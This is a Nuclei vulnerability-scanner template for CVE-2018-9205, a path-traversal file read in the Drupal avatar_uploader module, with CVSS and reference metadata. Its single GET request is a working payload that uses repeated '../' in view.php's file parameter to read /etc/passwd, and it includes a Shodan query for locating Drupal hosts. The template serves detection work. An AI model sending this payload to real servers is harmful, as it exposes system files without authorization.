nuclei-templates/http/cves/2018/CVE-2018-9205.yaml

43 lines
1.3 KiB
YAML

id: CVE-2018-9205
info:
name: Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion
author: daffainfo
severity: high
description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.
remediation: Upgrade to the latest version of avatar_uploader.
reference:
- https://www.exploit-db.com/exploits/44501
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
- https://www.drupal.org/project/avatar_uploader/issues/2957966
- https://www.drupal.org/project/avatar_uploader
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-9205
cwe-id: CWE-22
epss-score: 0.0276
epss-percentile: 0.894
cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:*
metadata:
max-request: 1
vendor: drupal
product: avatar_uploader
shodan-query: http.component:"drupal"
tags: cve,cve2018,lfi,drupal,edb
http:
- method: GET
path:
- "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200